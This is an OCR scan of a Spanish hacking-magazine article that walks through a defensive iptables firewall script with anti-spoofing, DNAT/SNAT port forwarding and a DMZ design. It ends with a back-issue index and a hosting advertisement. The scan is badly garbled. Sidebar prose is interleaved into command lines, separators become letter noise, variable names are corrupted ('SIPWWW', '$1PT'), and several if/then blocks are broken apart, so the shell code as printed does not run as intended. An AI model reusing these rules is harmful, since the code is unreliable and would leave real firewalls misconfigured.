reglas para el control de inundaciones SYN. 
> El tráfico entrante en la que alguna IP esté 


————— | definida dentro de la lista de I1P's excluidas, se 
registra y rechaza (el bucle for de tráfico de 


HHHHHHAHHE RRHH AHHH RAHARRA entrada) 
++ CONTROL DE TRAFICO IP ENTRANTE 
HHHHHHRHHEAA RARE AHHH AA AHARAA > El tráfico entrante que 


$IPT -N IP_ENTRADA ¡ 
for traficoentrada in $IPEXCLUIDAS llegue a la interfaz externa 
cuyo origen sea la IP 


do 

$IPT -A IP_ENTRADA -s $traficoentrada -j REGISTRAIPEXCLUIDAS 
done externa, se registra y 
S$IPT -A IP_ENTRADA -i $NICEXTERNAFW -s HIPEXTERNAFW -j REGISTRAIPEXCLUIDAS desca rta (el cortafuegos no 


$IPT -A IP_ENTRADA -i $NICEXTERNAFW -s $DIRREDINTERNA -j REGISTRAIPEXCLUIDAS 
$IPT -A IP_ENTRADA -i $NICINTERNAFW -s $HIPEXTERNAFW -j REGISTRAIPEXCLUIDAS debe ace p tar nunca 


ARE AEAR RARA AEREA AEREA AEREA AEREA AEREA AEREA AEREA iríai 
% CONTROL DE TRÁFICO 1P SALIENTE paquetes dirigidos hacia una 
AAEAEAA RAE REA AEAR RARE REIR ARE AEACRR ARRE AEAAARAA de sus interfaces si el origen 


$IPT -N IP_SALIDA es esa interfaz... eso sería 


for traficosalida in $IPEXCLUIDAS 
do í j 
$IPT -A IP_SALIDA -s $traficosalida -j REGISTRAIPEXCLUIDAS un síntoma de spoofing) 


done 


$IPT -A IP_SALIDA -o $NICEXTERNAFW -s $IPEXTERNAFW -j RETURN 
$IPT -A IP_SALIDA -o $NICINTERNAFW -s HIPINTERNAFW -j RETURN 
$IPT -A IP_SALIDA -j REGISTRAIPEXCLUIDAS 


> Tampoco se aceptarán paquetes que lleguen a la IP externa cuyo origen se la dirección de red interna... 
para eso está FORWARD. 

> Y la última regla de descarte y registro de entrada es “no hacer caso” a los paquetes que lleguen a 
la interfaz interna cuyo origen sea la IP externa... eso también es síntoma de spoofing. 


Para los paquetes de salida: 


b Se registran y descartan las Ip's excluidas, el otro bucle for) 

> Aquello que salga de la tarjeta externa cuyo origen sea la propia IP externa... se usó RETURN, es 
decir, que “de momento vale” a no ser que otra cadena lo invalide. 

> Lo mismo ocurre con los datos que sales de la NIC interna, si el origen es la propia NIC interna, de 
momento valen (el otro RETURN). 

> El resto del tráfico saliente se descarta y registra, es lógico, como vamos a hacer SNAT y DNAT, el 
tráfico de salida debe ser exclusivamente el que generen sus propias interfaces e Ip's. 


Parte IX. Código IPTFWRED-HxC 
HHHHHHEHRER ARA RH RA HAHAHA RARA HAHAHAHA AAA AAA 


++ CONTROL DE NAT DE DESTINO. DNAT 
PERERA AE AE AE RARE RA AER AEREA RE AEREA AEREA HE ARRE AA AE AEREA AE AEREA AH AR AAA 


if [ "SIPWWW" I=""] 
then 

$IPT -t nat -A PREROUTING -i $NICEXTERNAFW -p tcp -d SIPEXTERNAFW --dport 80 -j DNAT ---to-destination $HIPWWW 
fi 
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if [ "SIPDNS" !=""] 
then 

$IPT -t nat -A PREROUTING -¡ $NICEXTERNAFW -p udp -d $IPEXTERNAFW --dport 53 -j DNAT --to-destination $HIPDNS 
fi 


if [ "SIPPOP3" !=""] 
then 

$IPT -t nat -A PREROUTING -¡ $NICEXTERNAFW -p tcp -d $IPEXTERNAFW --dport 110 -j DNAT ---to-destination $IPPOP3 
fi 


if [ "SIPSMTP" !=""] 
then 

$IPT -t nat -A PREROUTING -¡ $NICEXTERNAFW -p tcp -d $IPEXTERNAFW --dport 25 -j DNAT ---to-destination $HIPSMTP 
fi 


if [ "SIPFTP" !=""] 
then 

$IPT -t nat -A PREROUTING -¡ $NICEXTERNAFW -p tcp -d $IPEXTERNAFW --dport 21 -j DNAT ---to-destination $IPFTP 
fi 


if [ "$SIPTS" l= .”.. ] 
then 

$IPT -t nat -A PREROUTING -¡ $NICEXTERNAFW -p tcp -d $IPEXTERNAFW --dport 3389 -j DNAT ---to-destination $IPTS 
fi 


Bien, esto sí que corresponde a lo visto y estudiado en este artículo. 
Hacemos DNAT (abrimos los servicios internos al exterior) por los puertos y Servidores concretos. 


Como algunas IP's de los servidores no están inicializadas, comprobamos con una estructura condicional If- 
Then-fi, que la variable que guarda la IP del servidor interno contiene algún valor, si es así se añade la regla 
DNAT correspondiente, si está en blanco, no se añade nada a la tabla NAT y se pasa a la siguiente... 


Parte X. Código IPTFWRED-HxC 


HHHHHHHHEAREA RARA AA ARAR AA AAA AAA ARA REA 
++ CONTROL DE NAT DE ORIGEN. SNAT 
HHHHHHHHEAREAR ARA AHH RARA RARA AH AH ARA 


$IPT -t nat -A POSTROUTING -o $NICEXTERNAFW -j SNAT --to-source $IPEXTERNAFW 


po 


Bueno, esto también corresponde a éste artículo... es e 


enmascaramiento” SNAT en origen, todas las 1P's de la red 


interna se traducen por el contenido de la IP externa del cortafuegos... también podríamos haber usado -j MASQUERADE 


en lugar de -j SNAT --to-source ..... 


Parte XI. Código IPTFWRED-HxC 


PERA SERE RE PREA ERRE AEREA AEREA RA DEAR REDES REA RREARAR 
++ CONTROL DE PAQUETES TCP/UDP DE ENTRADA AL FIREWALL 
PERA SERE RE SAARIEEREREREA RAE DESEA DERE RECAER DEAR DE REARAR 


$IPT -N ENTRADA 

$IPT -A ENTRADA -p icmp -j ENTRADA_ICMP 

$IPT -A ENTRADA -m state --state INVALID -j DROP 

$IPT -A ENTRADA -p tcp --syn -j FLOODSYN 

$IPT -A ENTRADA -m state --state ESTABLISHED,RELATED -j ACCEPT 
$IPT -A ENTRADA -j IP_ENTRADA 


++ CONEXIONES ENTRANTES PERMITIDAS (SOLO PUERTOS 22 y/O 80) Y AUTORIZACION 
++ TOTAL SI EL TRAFICO PROVIENE DE LAS 1P'S PUBLICAS DESCRITAS PARA EL ADMINISTRADOR 


for ipsegura in $SSH 

do 

$IPT -A ENTRADA -p tcp -s $ipsegura --dport 22 -m state --state NEW -j ACCEPT 
done 


for ipadmin in $IPADMIN 

do 

$IPT -A ENTRADA -p tcp -s $ipadmin -m state ---state NEW -j ACCEPT 
done 

$IPT -A ENTRADA -j DROP 
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Con estas reglas pretendemos 
establecer los criterios que han 
de cumplir los paquetes que le 
llegan al propio firewall. 


Como esto es un cortafuegos de 
red, tendremos que definir reglas 
específicas para lo que es el tráfico 
de entrada al cortafuegos y el 
tráfico de entrada a la red 
protegida (no como antes, que 
sólo nos debía preocupar lo que 
le llegaba al cortafuegos). Igual 
le ocurrirá al tráfico de salida, 
tendrán que existir reglas 
diferentes para lo que es salida 
del cortafuegos y salida de la red 
protegida. 
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En esta ocasión, como entrada al firewall sólo permitimos accesos NUEVOS al mismo por los puertos descritos 
y por las IPs que contienen las variables: SSH, IPADMIN. Mientras que SI permitimos que entren aquellas 
conexiones establecidas desde el interior o que fuesen relacionadas con otra previamente establecida. Me 


repito mucho, lo sé... pero esto mismo ya se utilizó en el otro artículo. 


Parte XIT. Código IPTFWRED-HxC 


HHHHHHHBHHHA REA RARA RARA HAHAHA RARA 
++ CONTROL DE PAQUETES TCP/UDP DE SALIDA DEL FIREWALL 
HHHHHHHHHHHA RARA RARA AA AMARA AAA ARA 


$IPT -N SALIDA 

$IPT -A SALIDA -p icmp -j SALIDA_ICMP 

$IPT -A SALIDA -m state --state ESTABLISHED,RELATED -j ACCEPT 
$IPT -A SALIDA -j IP_SALIDA 

++ CONEXIONES SALIENTES QUE SE PERMITEN, NUESTROS 

+ CLIENTES DE LA RED SOLO PODRAN 

++ ESTABLECER CONEXIONES A LOS SERVICIOS: FTP, 4 SSH, 

4 DNS, HTTP, + HTTPS 


++ PARA TCP SON: 


$IPT -A SALIDA -m state --state NEW -p tcp --dport 21 -j ACCEPT 


$IPT -A SALIDA -m state --state NEW -p tcp --dport 22 -j ACCEPT 
$IPT -A SALIDA -m state --state NEW -p tcp --dport 53 -j ACCEPT 
$IPT -A SALIDA -m state --state NEW -p tcp --dport 80 -j ACCEPT 
$IPT -A SALIDA -m state --state NEW -p tcp --dport 443 -j ACCEPT 


* PARA UDP SON: 
$IPT -A SALIDA -m state --state NEW -p udp --dport 53 -j ACCEPT 


+ SI DESEAS AÑADIR NUEVOS SERVICIOS SOLO 

++ TIENES QUE COPIAR CUALQUIERA DE LAS 

++ LINEAS ANTERIORES Y CAMBIAR EL PUERTO Y 

++ PROTOCOLOQUE USA EL SERVICIO. POR EJEMPLO 
$ $1PT -A SALIDA -m state --state NEW -p 

+ tcp --dport 25 -j ACCEPT PARA CORREO SALIENTE 
$IPT -A SALIDA -j DROP 


Parte XIII. Código IPTFWRED-HxC 


TERRA AER AR AA AE AE AA RAE AEREA AE AE AEREA AE AE AE ASE AE AE AE RE RARE 
++ CONTROL DE PAQUETES TCP/UDP DE ENTRADA A 
++ LA RED INTERNA 

HHHHEHHARHHEA RARE AA HAHAHA AAAA AAA AAA AARARE 


$IPT -N ENTRADA_REDINTERNA 

$IPT -A ENTRADA_REDINTERNA -p icmp -j ENTRADA_ICMP 

$IPT -A ENTRADA_REDINTERNA -p tcp --syn -j FLOODSYN 

$IPT -A ENTRADA_REDINTERNA -m state --state INVALID -j DROP 


$IPT -A ENTRADA_REDINTERNA -m state --state ESTABLISHED,RELATED -j ACCEPT 


if [ "SIPWWW" !=""] 
th 


fi 
if [ "SIPDNS" !=""] 
the 


n 
a $IPT -A ENTRADA_REDINTERNA -p udp -d $IPDNS --dport 53 -j ACCEPT 
] 


if [ "SIPPOP3" !=""] 
then 


$IPT -A ENTRADA_REDINTERNA -p tcp --syn -d $IPPOP3 --dport 110 -j ACCEPT 


fi 


if [ "SIPSMTP" !=""] 
then 


en 
$IPT -A ENTRADA_REDINTERNA -p tcp --syn -d $HIPWWW --dport 80 -j ACCEPT 


Esta sección describe las reglas para 
el control del tráfico de salida del 
cortafuegos y estarán íntimamente 
relacionadas con las reglas DNAT, 
con las reglas de tráfico saliente de 
la red protegida y con los filtros que 
se establecieron en el router 
LAN/WAN. 


Revisa el escenario y verás que todos 
esos puertos por los que se permite 
el tráfico de salida estarán presentes 
en los filtros del router y en DNAT. 


Esta sección define los 
servicios “abiertos” para 
que los clientes externos 
puedan acceder a los 
mismos, debe 
corresponderse con 
aquellos que se 
añadieron en DNAT o no 
tendría mucho sentido. 


$IPT -A ENTRADA_REDINTERNA -p tcp --syn -d $IPSMTP --dport 25 -j ACCEPT 


fi 


if [ "SIPFTP" 1=""] 

then 

$IPT -A ENTRADA_REDINTERNA -p tcp --syn -d $IPFTP --dport 21 -j ACCEPT 
fi 


if [ "SIPTS" != ""] 


th 
fi 
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en 
$IPT -A ENTRADA_REDINTERNA -p tcp --syn -d $1PTS --dport 3389 -j ACCEPT 
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Parte XIV. Código IPTFWRED-HxC 


HHHHHRHHHRARHEA ARA HR AAHA RAE ARA 
++ CONTROL DE PAQUETES TCP/UDP DE SALIDA DE 
++ LA RED INTERNA 


HEMAAEAA AAA AE AEREA A AAA A AAA AEREA AE AEREA AE RRAA: 


$IPT -N SALIDA_REDINTERNA 

H $IPT -A SALIDA_REDINTERNA -s ! $IPEXTERNAFW -j DROP 

$IPT -A SALIDA_REDINTERNA -p icmp -j SALIDA_ICMP 

$IPT -A SALIDA_REDINTERNA -m state --state ESTABLISHED,RELATED -j ACCEPT 
H CONEXIONES SALIENTES QUE SE PERMITEN, 

H NUESTROS CLIENTES DE LA RED SOLO PODRAN 

H ESTABLECER CONEXIONES A LOS SERVICIOS: 

H FTP, SSH, DNS, HTTP, HTTPS 


Como es lógico tenemos 
que definir qué servicios 
y puertos serán los 
permitidos para que 
nuestros clientes internos 
salgan a otras redes o a 
Internet, es decir, todo lo 


++ PARA TCP SON: 


$IPT -A SALIDA_REDINTERNA -m state --state NEW -p tcp --dport 21 -j ACCEPT 
$IPT -A SALIDA_REDINTERNA -m state --state NEW -p tcp --dport 22 -j ACCEPT . A , 
$IPT -A SALIDA_REDINTERNA -m state --state NEW -p tcp --dport 53 -j ACCEPT que se incluye aquí serán 
$IPT -A SALIDA_REDINTERNA -m state --state NEW -p tcp --dport 80 -j ACCEPT JN1I servici 

$IPT -A SALIDA_REDINTERNA -m state --state NEW -p tcp --dport 443 -j ACCEPT os UNICOS se Ñ E hd a 
$IPT -A SALIDA_REDINTERNA -m state --state NEW -p tcp --dport 3389 -j ACCEPT los que las máquinas 


+ PARA UDP SON: internas podrán acceder. 


$IPT -A SALIDA_REDINTERNA -m state --state NEW -p udp --dport 53 -j ACCEPT 


+ SI DESEAS AÑADIR NUEVOS SERVICIOS SOLO 

++ TIENES QUE COPIAR CUALQUIERA DE LAS 

++ LINEAS ANTERIORES Y CAMBIAR EL PUERTO Y 

++ PROTOCOLOQUE USA EL SERVICIO. POR EJEMPLO 

$ $IPT -A SALIDA_REDINTERNA -m state --state NEW -p tcp --dport 25 -j ACCEPT 
HPARA CORREO SALIENTE 


TEAEAH AAA RAE AEREA AO AE AE AEREA A AEREA AE AE AEREA AE AE AEREA AER RAARE 
++ REGLAS PARA CADENAS PREDEFINAS POR IPTABLES 
HHHHEHAHHEAR HAHAHA A AAA AAA AAA AEREA AAA AAA RARA 


Parte XV Código IPTFWRED-HxC PARA FORWARD 


$IPT -A FORWARD -j IPEXCLUIDAS 

$IPT -A FORWARD -j LOG --log-prefix "IPT FORWARD: " $OPCIONESREG 
$IPT -A FORWARD -i $NICEXTERNAFW -j ENTRADA_REDINTERNA 

$IPT -A FORWARD -i $NICINTERNAFW -j SALIDA_REDINTERNA 

$IPT -A FORWARD -j DROP 


Llegamos al final, sólo nos falta definir 
las reglas para las cadenas predefinidas 


y “asociarlas” con las definidas por H PARA INPUT 

nosotros, esto cambien se explicó en el re 4 ACCEPT 

artículo anterior, lo único significativo de $IPT -A INPUT -j IPEXCLUIDAS 
iZ Las , $IPT -A INPUT -j FLOODSYN 

esta porción de código es que aquí se $IPT-A INPUT -j ENTRADA 

incluyen reglas para FORWARD puesto $IPT -A INPUT -] ENTRADA_ICMP 

NAT rtí $IPT -A INPUT -j IP_ENTRADA 
que usamos , Cosa que en el artículo $IPT -A INPUT -j DROP 


anterior no hacía falta. 


+ PARA OUTPUT 
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$IPT -A OUTPUT -o lo 
$IPT -A OUTPUT 
$IPT -A OUTPUT 
$IPT -A OUTPUT 
$IPT -A OUTPUT 
$IPT -A OUTPUT 
$IPT -A OUTPUT 


-j ACCEPT 

-j IPEXCLUIDAS 
-j FLOODSYN 

-j SALIDA 

-j IP_SALIDA 

-j SALIDA_ICMP 
-j DROP 
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Figura 3. Escenario 
red protegida + DMZ 
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Pues con esto hemos terminado y también 
como en el artículo anterior. Os pongo 
un link en el que podéis descargar este 
código enterito, las 15 partes, para que 
no tengáis que teclearlo y hacer más 
sencillas las prácticas... Ahh!!! Y también 
se incluye el cortafuegos del artículo 
anterior.... 


http://www.forohxc.com/Docs/fw/24/c 
ortafuegos.zip 


Antes “de irme” fijaos qué sencillo sería 
implementar una DMZ en este diseño, 
bastaría con colgar de la “red externa” la 
172.28.0.0/16 aquellos hosts que 
queramos que tengan acceso público sin 
permitir a los clientes de Internet acceder 
a nuestra red interna (la 192.168.0.0/24) 
que aunque puede seguir protegida por 
este mismo cortafuegos, se la “excluye” 
de accesos externos.... más seguridadpor 
el mismo precio Y 


Switch LAN: 192.168.0.0/24 


NIC: 192.168.0.254/24 


LINUX+Firewall+Router+IPTables 


NIC: 172.28.0.254/16 


Incluso podríamos implementar otro cortafuegos protegiendo exclusivamente 
al servidor web 172.28.0.9/16 de la DMZ, del tipo del artículo anterior, ese 


mismo nos serviría.... 


Ahora sí, al menos me despido de IPTables y de los firewalls... ¿Qué 


vendrá después 3?.... 
Saludos, 


Vic_ Thor. 
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PLOTANDO 
RVID 


NÚMERO 11: NÚMERO 12: 


- Curso de linux: programacion - Curso de linux: programacion C. 
- Visual Basic: IIS bug exploit - Visual Basic: IIS bug exploit. Nuestro primer Scanner. 


- Apache como proxy - APACHE: Configuralo de forma segura. 
- Serie Raw: FTP - Serie Raw: FTP(I1) 
- Validacion XML: DTD - VALIDACION XML: DTD (11) 


- Historia: Lady Augusta Ada Byron 


EA x a E Mrino- - APRENDE a ESCANEAR LA RED 


PROGRAMANDO ¡EN 
se 


Oz >= 
DESDE LINUX 


> 


PC-PASO/APASO: PROTOCOLOS DEINTERNET — EL VERDADERO CONOGIMIENTO 


4 NÚMERO 14: 
NUMERO 13: - Curso de linux: programacion C(lI!). 
- Curso de linux: programacion C(Il). - Visual Basic:Nuestro primer proyecto(l!). 


- Visual Basic:Nuestro primer proyecto. - Curso de PHP 


- APACHE: Configuralo de forma segura. - Serie Raw: DNS. 
- Serie Raw: HTTP. - CURSO XML: DOM(I1). 


- CURSO XML: DOM. - HIJACKING 


HACK X CRACK: CREA CON NOSOTROS UN GENERADOR DE IPS EN PHP 


SERIE 


RAW 


NUMERO 15: . 
- CURSO DE PHP (II) 
- Xbox. Instalar Linux 
- SERIE RAW (9): MSN d 
- CURSO VISUAL BASIC: UN CLIENTE, 

UNA NECESIDAD(I!!). 
- PROGRAMACION BAJO LINUX: LENGUAJE C(I!1) 


DOMINIOS | CORREO PERSONALIZADO | ALOJAMIENTO | CREACION DE PAGINAS | E-COMMERCE | SERVIDORES DEDICADOS 


amen 


IN WEB WE TRUST 


PACK WEB SERVIDOR 
* Linux A 
- AMD DURON 1600 MHz 
- 256 Mb RAM (ext. a 512 Mb) 
- Disco duro 80 Gb (ext. 120 Gb) 
- 700 Gb de tráfico 
21 dirección IP fija (ext. a 4) 
- Interfaz de administración PLESK 
* Ningún gasto oculto 
- Ningún gasto de puesta en servicio 


CONECTESE A NUESTRA WEB www.amen.es 

ELIGE LAS CARACTERISTICAS DE SU SERVIDOR DEDICADO 
ELIGE LA DURACIÓN DE SU PACK (1, 3 ó 6 MESES) 

ELIGE SU SISTEMA OPERATIVO 

ELIGE SU INTERFAZ DE ADMINISTRACIÓN 


PAGUE CON TARJETA, TRANSFERENCIA O CHEQUE. 6 3 € 
/mes 
SIN CONTRATO 


49 e... 


REBOOT INSTANTANEO, SALVAGUARDA DE SUS DATOS, REINSTALACIÓN DEL SISTEMA OPERATIVO, 


MONITORIZACIÓN DE LA RED Y DE SU TRÁFICO, DIRECCIÓN IP FIJA SUPLEMENTARIA. CO NTRATO SEMESTRAL 


902 165 902 WWw.amen.es 


* Lea las condiciones generales de venta en www.amen.es! io sin IVA al 1/6/2004. Información válida salvo error tipográfico. 


